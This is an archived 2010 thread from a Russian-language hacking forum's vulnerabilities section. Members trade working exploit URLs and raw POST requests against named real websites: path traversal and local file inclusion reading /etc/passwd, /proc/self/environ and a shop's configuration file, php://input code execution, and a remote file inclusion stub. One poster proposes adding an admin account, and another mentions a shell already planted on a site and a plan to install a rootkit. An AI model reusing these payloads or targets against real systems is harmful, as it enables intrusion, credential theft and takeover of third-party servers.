HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 30.08.2010, 14:05
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

Код:
http://polyakovprud.dp.ua/index.php?page=/../../../../../../../../../proc/self/environ
Код:
http://mir-audio.com.ua/admin/file_manager.php/login.php?action=download&filename=includes/configure.php
для последнего: /showthread.php?t=71111 можно админа добавить и тупо под ним зайти
 
Ответить с цитированием

  #2  
Старый 30.08.2010, 23:35
daniel_1024
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831

Репутация: 34
По умолчанию

php://input

выполнение произвольного php - кода, редко вижу.

итак, выполняем следующие пост-запросы:

Код:
POST /index.php?link=php://input HTTP/1.1
Host: www.alternativeautosource.net
Content-Length: 19
Код:
POST /lang_de/main.php?view=php://input HTTP/1.1
Host: www.galvania.ca
Content-Length: 19
Код:
POST /page_en.php?link=php://input HTTP/1.1
Host: www.rochelle.cz
Content-Length: 19
и видим PHPINFO серверов

Код:
POST /WWW/main.php?CONTENT=php://input HTTP/1.1
Host: polyplast-mainz.de
Content-Length: 27
а тут листинг директории))
 
Ответить с цитированием

  #3  
Старый 31.08.2010, 12:18
*uNkN0Wn*
Участник форума
Регистрация: 25.03.2009
Сообщений: 149
Провел на форуме:
1739459

Репутация: 116
По умолчанию

Код HTML:
http://www.sexycamnow.com/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00
Код HTML:
http://grindhouze.com/cms/index.php/recent/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00
Код HTML:
http://www.semiprice.fr/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00
 
Ответить с цитированием

  #4  
Старый 01.09.2010, 20:08
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


По умолчанию

http://www.tierheim-spanien.de/thspa.php?inc=../../../../../../../../../../etc/passwd%00
 
Ответить с цитированием

  #5  
Старый 05.09.2010, 21:51
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


По умолчанию

RFI

http://www.axode.com/en/products.php?module_catalogue_page=[/COLOR][/B]
 
Ответить с цитированием

  #6  
Старый 07.09.2010, 19:49
Chi
Новичок
Регистрация: 30.08.2010
Сообщений: 9
Провел на форуме:
2026

Репутация: 0
По умолчанию

Один из крупнейших порталов по теме образования в Латвии :

Код:
http://shkola.lv/index.php?mode=goods&page=../../../../../etc/passwd%00
 
Ответить с цитированием

  #7  
Старый 10.09.2010, 08:14
Keltos
Iron Man#2
Регистрация: 08.07.2009
Сообщений: 2,084
Провел на форуме:
3896191

Репутация: 2562


По умолчанию

Код:
http://www.hyaffiliates.com/affiliate/scripts/showPop.php?special=1&banner_content=file:///etc/passwd&impression_content=image&clickurl=image
Код:
http://pheromore.com/affiliate/scripts/showPop.php?special=1&banner_content=file:///etc/passwd&impression_content=image&clickurl=image
Код:
http://www.4xwins.com/affiliate/scripts/showPop.php?special=1&banner_content=file:///etc/passwd&impression_content=image&clickurl=image
Код:
http://www.blastarticles.com/affiliate/scripts/showPop.php?special=1&banner_content=file:///etc/passwd&impression_content=image&clickurl=image
Код:
http://www.attractingabundance.com/affiliate/scripts/showPop.php?special=1&banner_content=file:///etc/passwd&impression_content=image&clickurl=image
Код:
http://www.parentcoachplan.com/affiliate/scripts/showPop.php?special=1&banner_content=file:///etc/passwd&impression_content=image&clickurl=image
 
Ответить с цитированием

  #8  
Старый 11.09.2010, 20:25
ubi
Новичок
Регистрация: 25.12.2009
Сообщений: 18
Провел на форуме:
278340

Репутация: 0
По умолчанию

http://www.wirtualnailawa.pl/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00
 
Ответить с цитированием

  #9  
Старый 12.09.2010, 22:20
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

http://www.virtualiroma.it/index.php?open=/web/htdocs/www.virtualiroma.it/home/index.php

http://www.giardinodiroma.eu/index.php?open=../../../../../../../etc/issue
 
Ответить с цитированием

  #10  
Старый 17.09.2010, 13:59
valyka80
Новичок
Регистрация: 14.06.2010
Сообщений: 0
Провел на форуме:
930

Репутация: 0
По умолчанию

http://www.smacworld.com/new/index.php?p=../../../../../../../../../../proc/self/environ

Кому интересно там есть шелл,

но немогу rootkit поставить нет еще сплоитов
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PSalm69 Избранное 273 13.02.2016 01:24
Books PHP FRAGNATIC PHP 186 21.02.2010 02:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.